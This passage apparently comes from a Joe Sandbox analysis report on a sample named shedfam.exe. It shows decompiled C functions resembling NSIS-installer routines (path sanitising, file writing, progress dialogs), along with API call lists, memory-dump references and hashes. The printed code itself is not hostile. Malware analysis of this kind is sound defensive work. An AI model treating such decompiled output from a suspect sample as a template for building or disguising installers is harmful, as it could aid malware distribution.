                                                                  • lstrlenA.KERNEL32(00422F20,?,0041FD58,00000000,0040501F,0041FD58,00000000), ref: 00405F1C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_shedfam.jbxd
                                                                  Similarity
                                                                  • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                  • String ID: /B$ /B$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                  • API String ID: 900638850-1912783298
                                                                  • Opcode ID: ee09a9c52303261f868f349784a0779ca10ef7a21b96b539f3853377137e7d47
                                                                  • Instruction ID: bc679195f81621fcb390d0e71ed0d7b45f11abfd0e51c03931a277fa57cc5d3e
                                                                  • Opcode Fuzzy Hash: ee09a9c52303261f868f349784a0779ca10ef7a21b96b539f3853377137e7d47
                                                                  • Instruction Fuzzy Hash: A051F471A04A02ABEB256F24DC847BB3B74DB55315F50823BE991B62D0D33C4A42DF8E
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			E00405F5D(CHAR* _a4) {
                                                                  				char _t5;
                                                                  				char _t7;
                                                                  				char* _t15;
                                                                  				char* _t16;
                                                                  				CHAR* _t17;
                                                                  
                                                                  				_t17 = _a4;
                                                                  				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
                                                                  					_t17 =  &(_t17[4]);
                                                                  				}
                                                                  				if( *_t17 != 0 && E0040585B(_t17) != 0) {
                                                                  					_t17 =  &(_t17[2]);
                                                                  				}
                                                                  				_t5 =  *_t17;
                                                                  				_t15 = _t17;
                                                                  				_t16 = _t17;
                                                                  				if(_t5 != 0) {
                                                                  					do {
                                                                  						if(_t5 > 0x1f &&  *((char*)(E00405819("*?|<>/\":", _t5))) == 0) {
                                                                  							E00405993(_t16, _t17, CharNextA(_t17) - _t17);
                                                                  							_t16 = CharNextA(_t16);
                                                                  						}
                                                                  						_t17 = CharNextA(_t17);
                                                                  						_t5 =  *_t17;
                                                                  					} while (_t5 != 0);
                                                                  				}
                                                                  				 *_t16 =  *_t16 & 0x00000000;
                                                                  				while(1) {
                                                                  					_t16 = CharPrevA(_t15, _t16);
                                                                  					_t7 =  *_t16;
                                                                  					if(_t7 != 0x20 && _t7 != 0x5c) {
                                                                  						break;
                                                                  					}
                                                                  					 *_t16 =  *_t16 & 0x00000000;
                                                                  					if(_t15 < _t16) {
                                                                  						continue;
                                                                  					}
                                                                  					break;
                                                                  				}
                                                                  				return _t7;
                                                                  			}








                                                                  0x00405f5f
                                                                  0x00405f67
                                                                  0x00405f7b
                                                                  0x00405f7b
                                                                  0x00405f81
                                                                  0x00405f8e
                                                                  0x00405f8e
                                                                  0x00405f8f
                                                                  0x00405f91
                                                                  0x00405f95
                                                                  0x00405f97
                                                                  0x00405fa0
                                                                  0x00405fa2
                                                                  0x00405fbc
                                                                  0x00405fc4
                                                                  0x00405fc4
                                                                  0x00405fc9
                                                                  0x00405fcb
                                                                  0x00405fcd
                                                                  0x00405fd1
                                                                  0x00405fd2
                                                                  0x00405fd5
                                                                  0x00405fdd
                                                                  0x00405fdf
                                                                  0x00405fe3
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00405fe9
                                                                  0x00405fee
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00405fee
                                                                  0x00405ff3

                                                                  APIs
                                                                  • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\shedfam.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040322A,C:\Users\user\AppData\Local\Temp\,00000000,004033DB), ref: 00405FB5
                                                                  • CharNextA.USER32(?,?,?,00000000), ref: 00405FC2
                                                                  • CharNextA.USER32(?,"C:\Users\user\Desktop\shedfam.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040322A,C:\Users\user\AppData\Local\Temp\,00000000,004033DB), ref: 00405FC7
                                                                  • CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040322A,C:\Users\user\AppData\Local\Temp\,00000000,004033DB), ref: 00405FD7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_shedfam.jbxd
                                                                  Similarity
                                                                  • API ID: Char$Next$Prev
                                                                  • String ID: "C:\Users\user\Desktop\shedfam.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                  • API String ID: 589700163-4272030048
                                                                  • Opcode ID: d92e83827d112835d619967b6ac8f9983d34a3d52fae7c27db10b6e3fc01a34b
                                                                  • Instruction ID: afd4a01125e034af7a3871a1a8bdb924777211b2e54028c3170dd0334d944cbd
                                                                  • Opcode Fuzzy Hash: d92e83827d112835d619967b6ac8f9983d34a3d52fae7c27db10b6e3fc01a34b
                                                                  • Instruction Fuzzy Hash: 7111B251808B962DEB3216384C44B777F9DCB967A0F5844BBE9C5722C2C67C9C438B6D
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			E0040401E(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                                                                  				struct tagLOGBRUSH _v16;
                                                                  				long _t35;
                                                                  				long _t37;
                                                                  				void* _t40;
                                                                  				long* _t49;
                                                                  
                                                                  				if(_a4 + 0xfffffecd > 5) {
                                                                  					L15:
                                                                  					return 0;
                                                                  				}
                                                                  				_t49 = GetWindowLongA(_a12, 0xffffffeb);
                                                                  				if(_t49 == 0) {
                                                                  					goto L15;
                                                                  				}
                                                                  				_t35 =  *_t49;
                                                                  				if((_t49[5] & 0x00000002) != 0) {
                                                                  					_t35 = GetSysColor(_t35);
                                                                  				}
                                                                  				if((_t49[5] & 0x00000001) != 0) {
                                                                  					SetTextColor(_a8, _t35);
                                                                  				}
                                                                  				SetBkMode(_a8, _t49[4]);
                                                                  				_t37 = _t49[1];
                                                                  				_v16.lbColor = _t37;
                                                                  				if((_t49[5] & 0x00000008) != 0) {
                                                                  					_t37 = GetSysColor(_t37);
                                                                  					_v16.lbColor = _t37;
                                                                  				}
                                                                  				if((_t49[5] & 0x00000004) != 0) {
                                                                  					SetBkColor(_a8, _t37);
                                                                  				}
                                                                  				if((_t49[5] & 0x00000010) != 0) {
                                                                  					_v16.lbStyle = _t49[2];
                                                                  					_t40 = _t49[3];
                                                                  					if(_t40 != 0) {
                                                                  						DeleteObject(_t40);
                                                                  					}
                                                                  					_t49[3] = CreateBrushIndirect( &_v16);
                                                                  				}
                                                                  				return _t49[3];
                                                                  			}








                                                                  0x00404030
                                                                  0x004040c4
                                                                  0x00000000
                                                                  0x004040c4
                                                                  0x00404041
                                                                  0x00404045
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0040404b
                                                                  0x00404054
                                                                  0x00404057
                                                                  0x00404057
                                                                  0x0040405d
                                                                  0x00404063
                                                                  0x00404063
                                                                  0x0040406f
                                                                  0x00404075
                                                                  0x0040407c
                                                                  0x0040407f
                                                                  0x00404082
                                                                  0x00404084
                                                                  0x00404084
                                                                  0x0040408c
                                                                  0x00404092
                                                                  0x00404092
                                                                  0x0040409c
                                                                  0x004040a1
                                                                  0x004040a4
                                                                  0x004040a9
                                                                  0x004040ac
                                                                  0x004040ac
                                                                  0x004040bc
                                                                  0x004040bc
                                                                  0x00000000

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_shedfam.jbxd
                                                                  Similarity
                                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                  • String ID:
                                                                  • API String ID: 2320649405-0
                                                                  • Opcode ID: 244050047767258f024cc5d970fbc24e44c9485df9f09a7a1d92820c249c5868
                                                                  • Instruction ID: 6c3acea846b2bea6830d2fc4e13120c874811c96ebe523463579326edd4eeab8
                                                                  • Opcode Fuzzy Hash: 244050047767258f024cc5d970fbc24e44c9485df9f09a7a1d92820c249c5868
                                                                  • Instruction Fuzzy Hash: AC2184B1904704ABC7319F78DD08B4B7BF8AF41714F048629EA95F22E0C734E904CB65
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 93%
                                                                  			E00402692(struct _OVERLAPPED* __ebx) {
                                                                  				void* _t27;
                                                                  				long _t32;
                                                                  				struct _OVERLAPPED* _t47;
                                                                  				void* _t51;
                                                                  				void* _t53;
                                                                  				void* _t56;
                                                                  				void* _t57;
                                                                  				void* _t58;
                                                                  
                                                                  				_t47 = __ebx;
                                                                  				 *((intOrPtr*)(_t58 - 0xc)) = 0xfffffd66;
                                                                  				_t52 = E00402A0C(0xfffffff0);
                                                                  				 *(_t58 - 0x38) = _t24;
                                                                  				if(E0040585B(_t52) == 0) {
                                                                  					E00402A0C(0xffffffed);
                                                                  				}
                                                                  				E004059B3(_t52);
                                                                  				_t27 = E004059D2(_t52, 0x40000000, 2);
                                                                  				 *(_t58 + 8) = _t27;
                                                                  				if(_t27 != 0xffffffff) {
                                                                  					_t32 =  *0x423f94;
                                                                  					 *(_t58 - 0x30) = _t32;
                                                                  					_t51 = GlobalAlloc(0x40, _t32);
                                                                  					if(_t51 != _t47) {
                                                                  						E00403207(_t47);
                                                                  						E004031D5(_t51,  *(_t58 - 0x30));
                                                                  						_t56 = GlobalAlloc(0x40,  *(_t58 - 0x20));
                                                                  						 *(_t58 - 0x34) = _t56;
                                                                  						if(_t56 != _t47) {
                                                                  							E00402F2E(_t49,  *((intOrPtr*)(_t58 - 0x24)), _t47, _t56,  *(_t58 - 0x20));
                                                                  							while( *_t56 != _t47) {
                                                                  								_t49 =  *_t56;
                                                                  								_t57 = _t56 + 8;
                                                                  								 *(_t58 - 0x48) =  *_t56;
                                                                  								E00405993( *((intOrPtr*)(_t56 + 4)) + _t51, _t57, _t49);
                                                                  								_t56 = _t57 +  *(_t58 - 0x48);
                                                                  							}
                                                                  							GlobalFree( *(_t58 - 0x34));
                                                                  						}
                                                                  						WriteFile( *(_t58 + 8), _t51,  *(_t58 - 0x30), _t58 - 0x3c, _t47);
                                                                  						GlobalFree(_t51);
                                                                  						 *((intOrPtr*)(_t58 - 0xc)) = E00402F2E(_t49, 0xffffffff,  *(_t58 + 8), _t47, _t47);
                                                                  					}
                                                                  					CloseHandle( *(_t58 + 8));
                                                                  				}
                                                                  				_t53 = 0xfffffff3;
                                                                  				if( *((intOrPtr*)(_t58 - 0xc)) < _t47) {
                                                                  					_t53 = 0xffffffef;
                                                                  					DeleteFileA( *(_t58 - 0x38));
                                                                  					 *((intOrPtr*)(_t58 - 4)) = 1;
                                                                  				}
                                                                  				_push(_t53);
                                                                  				E00401423();
                                                                  				 *0x424008 =  *0x424008 +  *((intOrPtr*)(_t58 - 4));
                                                                  				return 0;
                                                                  			}











                                                                  0x00402692
                                                                  0x00402694
                                                                  0x004026a0
                                                                  0x004026a3
                                                                  0x004026ad
                                                                  0x004026b1
                                                                  0x004026b1
                                                                  0x004026b7
                                                                  0x004026c4
                                                                  0x004026cc
                                                                  0x004026cf
                                                                  0x004026d5
                                                                  0x004026e3
                                                                  0x004026e8
                                                                  0x004026ec
                                                                  0x004026ef
                                                                  0x004026f8
                                                                  0x00402704
                                                                  0x00402708
                                                                  0x0040270b
                                                                  0x00402715
                                                                  0x00402734
                                                                  0x0040271c
                                                                  0x00402721
                                                                  0x00402729
                                                                  0x0040272c
                                                                  0x00402731
                                                                  0x00402731
                                                                  0x0040273b
                                                                  0x0040273b
                                                                  0x0040274d
                                                                  0x00402754
                                                                  0x00402766
                                                                  0x00402766
                                                                  0x0040276c
                                                                  0x0040276c
                                                                  0x00402777
                                                                  0x00402778
                                                                  0x0040277c
                                                                  0x00402780
                                                                  0x00402786
                                                                  0x00402786
                                                                  0x0040278d
                                                                  0x0040217a
                                                                  0x004028a4
                                                                  0x004028b0

                                                                  APIs
                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004026E6
                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 00402702
                                                                  • GlobalFree.KERNEL32 ref: 0040273B
                                                                  • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,000000F0), ref: 0040274D
                                                                  • GlobalFree.KERNEL32 ref: 00402754
                                                                  • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 0040276C
                                                                  • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402780
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_shedfam.jbxd
                                                                  Similarity
                                                                  • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                  • String ID:
                                                                  • API String ID: 3294113728-0
                                                                  • Opcode ID: 356a7779e7c14d45c55e2df14a00230252c27fbfde8db2330afdf1972136612e
                                                                  • Instruction ID: 9ca97f70dd32fe41b4909f681106d09eb720980563b4c140891508526f153775
                                                                  • Opcode Fuzzy Hash: 356a7779e7c14d45c55e2df14a00230252c27fbfde8db2330afdf1972136612e
                                                                  • Instruction Fuzzy Hash: 2331AD71C00028BBDF216FA5DE88DAE7E79EF05364F10023AF920762E1C77919409F99
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			E00404FE7(CHAR* _a4, CHAR* _a8) {
                                                                  				struct HWND__* _v8;
                                                                  				signed int _v12;
                                                                  				CHAR* _v32;
                                                                  				long _v44;
                                                                  				int _v48;
                                                                  				void* _v52;
                                                                  				void* __ebx;
                                                                  				void* __edi;
                                                                  				void* __esi;
                                                                  				CHAR* _t26;
                                                                  				signed int _t27;
                                                                  				CHAR* _t28;
                                                                  				long _t29;
                                                                  				signed int _t39;
                                                                  
                                                                  				_t26 =  *0x423764;
                                                                  				_v8 = _t26;
                                                                  				if(_t26 != 0) {
                                                                  					_t27 =  *0x424034;
                                                                  					_v12 = _t27;
                                                                  					_t39 = _t27 & 0x00000001;
                                                                  					if(_t39 == 0) {
                                                                  						E00405D1D(0, _t39, 0x41fd58, 0x41fd58, _a4);
                                                                  					}
                                                                  					_t26 = lstrlenA(0x41fd58);
                                                                  					_a4 = _t26;
                                                                  					if(_a8 == 0) {
                                                                  						L6:
                                                                  						if((_v12 & 0x00000004) == 0) {
                                                                  							_t26 = SetWindowTextA( *0x423748, 0x41fd58);
                                                                  						}
                                                                  						if((_v12 & 0x00000002) == 0) {
                                                                  							_v32 = 0x41fd58;
                                                                  							_v52 = 1;
                                                                  							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
                                                                  							_v44 = 0;
                                                                  							_v48 = _t29 - _t39;
                                                                  							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
                                                                  							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
                                                                  						}
                                                                  						if(_t39 != 0) {
                                                                  							_t28 = _a4;
                                                                  							 *((char*)(_t28 + 0x41fd58)) = 0;
                                                                  							return _t28;
                                                                  						}
                                                                  					} else {
                                                                  						_t26 =  &(_a4[lstrlenA(_a8)]);
                                                                  						if(_t26 < 0x800) {
                                                                  							_t26 = lstrcatA(0x41fd58, _a8);
                                                                  							goto L6;
                                                                  						}
                                                                  					}
                                                                  				}
                                                                  				return _t26;
                                                                  			}

















                                                                  0x00404fed
                                                                  0x00404ff9
                                                                  0x00404ffc
                                                                  0x00405002
                                                                  0x0040500e
                                                                  0x00405011
                                                                  0x00405014
                                                                  0x0040501a
                                                                  0x0040501a
                                                                  0x00405020
                                                                  0x00405028
                                                                  0x0040502b
                                                                  0x00405048
                                                                  0x0040504c
                                                                  0x00405055
                                                                  0x00405055
                                                                  0x0040505f
                                                                  0x00405068
                                                                  0x00405074
                                                                  0x0040507b
                                                                  0x0040507f
                                                                  0x00405082
                                                                  0x00405095
                                                                  0x004050a3
                                                                  0x004050a3
                                                                  0x004050a7
                                                                  0x004050a9
                                                                  0x004050ac
                                                                  0x00000000
                                                                  0x004050ac
                                                                  0x0040502d
                                                                  0x00405035
                                                                  0x0040503d
                                                                  0x00405043
                                                                  0x00000000
                                                                  0x00405043
                                                                  0x0040503d
                                                                  0x0040502b
                                                                  0x004050b6

                                                                  APIs
                                                                  • lstrlenA.KERNEL32(0041FD58,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C60,00000000,?), ref: 00405020
                                                                  • lstrlenA.KERNEL32(00402C60,0041FD58,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C60,00000000), ref: 00405030
                                                                  • lstrcatA.KERNEL32(0041FD58,00402C60,00402C60,0041FD58,00000000,00000000,00000000), ref: 00405043
                                                                  • SetWindowTextA.USER32(0041FD58,0041FD58), ref: 00405055
                                                                  • SendMessageA.USER32 ref: 0040507B
                                                                  • SendMessageA.USER32 ref: 00405095
                                                                  • SendMessageA.USER32 ref: 004050A3
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_shedfam.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                  • String ID:
                                                                  • API String ID: 2531174081-0
                                                                  • Opcode ID: 7d4126fadd151bd5520c35e17450624f2543502942b5ae19bdadc12a71b725fd
                                                                  • Instruction ID: e3991c5cb709e07264e8487875a2ca594626b649f9c95e4975d9101e96294db0
                                                                  • Opcode Fuzzy Hash: 7d4126fadd151bd5520c35e17450624f2543502942b5ae19bdadc12a71b725fd
                                                                  • Instruction Fuzzy Hash: 0A21AC71900508BBDF11AFA4CC849DFBFB9EF44354F10803AF504B62A0C2398E808FA8
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			E00402BE9(intOrPtr _a4) {
                                                                  				char _v68;
                                                                  				long _t6;
                                                                  				struct HWND__* _t7;
                                                                  				struct HWND__* _t15;
                                                                  
                                                                  				if(_a4 != 0) {
                                                                  					_t15 =  *0x41712c; // 0x0
                                                                  					if(_t15 != 0) {
                                                                  						_t15 = DestroyWindow(_t15);
                                                                  					}
                                                                  					 *0x41712c = 0;
                                                                  					return _t15;
                                                                  				}
                                                                  				__eflags =  *0x41712c; // 0x0
                                                                  				if(__eflags != 0) {
                                                                  					return E004060C3(0);
                                                                  				}
                                                                  				_t6 = GetTickCount();
                                                                  				__eflags = _t6 -  *0x423f8c;
                                                                  				if(_t6 >  *0x423f8c) {
                                                                  					__eflags =  *0x423f88;
                                                                  					if( *0x423f88 == 0) {
                                                                  						_t7 = CreateDialogParamA( *0x423f80, 0x6f, 0, E00402B51, 0);
                                                                  						 *0x41712c = _t7;
                                                                  						return ShowWindow(_t7, 5);
                                                                  					}
                                                                  					__eflags =  *0x424034 & 0x00000001;
                                                                  					if(( *0x424034 & 0x00000001) != 0) {
                                                                  						wsprintfA( &_v68, "... %d%%", E00402BCD());
                                                                  						return E00404FE7(0,  &_v68);
                                                                  					}
                                                                  				}
                                                                  				return _t6;
                                                                  			}







                                                                  0x00402bf5
                                                                  0x00402bf7
                                                                  0x00402bfe
                                                                  0x00402c01
                                                                  0x00402c01
                                                                  0x00402c07
                                                                  0x00000000
                                                                  0x00402c07
                                                                  0x00402c0f
                                                                  0x00402c15
                                                                  0x00000000
                                                                  0x00402c18
                                                                  0x00402c1f
                                                                  0x00402c25
                                                                  0x00402c2b
                                                                  0x00402c2d
                                                                  0x00402c33
                                                                  0x00402c71
                                                                  0x00402c7a
                                                                  0x00000000
                                                                  0x00402c7f
                                                                  0x00402c35
                                                                  0x00402c3c
                                                                  0x00402c4d
                                                                  0x00000000
                                                                  0x00402c5b
                                                                  0x00402c3c
                                                                  0x00402c87

                                                                  APIs
                                                                  • DestroyWindow.USER32(00000000,00000000), ref: 00402C01
                                                                  • GetTickCount.KERNEL32 ref: 00402C1F
                                                                  • wsprintfA.USER32 ref: 00402C4D
                                                                    • Part of subcall function 00404FE7: lstrlenA.KERNEL32(0041FD58,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C60,00000000,?), ref: 00405020
                                                                    • Part of subcall function 00404FE7: lstrlenA.KERNEL32(00402C60,0041FD58,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C60,00000000), ref: 00405030
                                                                    • Part of subcall function 00404FE7: lstrcatA.KERNEL32(0041FD58,00402C60,00402C60,0041FD58,00000000,00000000,00000000), ref: 00405043
                                                                    • Part of subcall function 00404FE7: SetWindowTextA.USER32(0041FD58,0041FD58), ref: 00405055
                                                                    • Part of subcall function 00404FE7: SendMessageA.USER32 ref: 0040507B
                                                                    • Part of subcall function 00404FE7: SendMessageA.USER32 ref: 00405095
                                                                    • Part of subcall function 00404FE7: SendMessageA.USER32 ref: 004050A3
                                                                  • CreateDialogParamA.USER32(0000006F,00000000,00402B51,00000000), ref: 00402C71
                                                                  • ShowWindow.USER32(00000000,00000005), ref: 00402C7F
                                                                    • Part of subcall function 00402BCD: MulDiv.KERNEL32(000D050E,00000064,?), ref: 00402BE2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_shedfam.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                  • String ID: ... %d%%
                                                                  • API String ID: 722711167-2449383134
                                                                  • Opcode ID: 18699f4e0f9d7d121d06d99e67b46d59f381e8d2f351c96e34ef888321a20e63
                                                                  • Instruction ID: c64e3f0d3b0757b6abccf377c05ef7dd5a4a2d15633f5d7fd60a106f882d1610
                                                                  • Opcode Fuzzy Hash: 18699f4e0f9d7d121d06d99e67b46d59f381e8d2f351c96e34ef888321a20e63
                                                                  • Instruction Fuzzy Hash: F701CC30909215A7E7216FA0AF4DE9E7778A709701750803BFA01B11D0D2F855458BAE
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			E004048B6(struct HWND__* _a4, intOrPtr _a8) {
                                                                  				long _v8;
                                                                  				signed char _v12;
                                                                  				unsigned int _v16;
                                                                  				void* _v20;
                                                                  				intOrPtr _v24;
                                                                  				long _v56;
                                                                  				void* _v60;
                                                                  				long _t15;
                                                                  				unsigned int _t19;
                                                                  				signed int _t25;
                                                                  				struct HWND__* _t28;
                                                                  
                                                                  				_t28 = _a4;
                                                                  				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
                                                                  				if(_a8 == 0) {
                                                                  					L4:
                                                                  					_v56 = _t15;
                                                                  					_v60 = 4;
                                                                  					SendMessageA(_t28, 0x110c, 0,  &_v60);
                                                                  					return _v24;
                                                                  				}
                                                                  				_t19 = GetMessagePos();
                                                                  				_v16 = _t19 >> 0x10;
                                                                  				_v20 = _t19;
                                                                  				ScreenToClient(_t28,  &_v20);
                                                                  				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
                                                                  				if((_v12 & 0x00000066) != 0) {
                                                                  					_t15 = _v8;
                                                                  					goto L4;
                                                                  				}
                                                                  				return _t25 | 0xffffffff;
                                                                  			}














                                                                  0x004048c4
                                                                  0x004048d1
                                                                  0x004048d7
                                                                  0x00404915
                                                                  0x00404915
                                                                  0x00404924
                                                                  0x0040492b
                                                                  0x00000000
                                                                  0x0040492d
                                                                  0x004048d9
                                                                  0x004048e8
                                                                  0x004048f0
                                                                  0x004048f3
                                                                  0x00404905
                                                                  0x0040490b
                                                                  0x00404912
                                                                  0x00000000
                                                                  0x00404912
                                                                  0x00000000

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
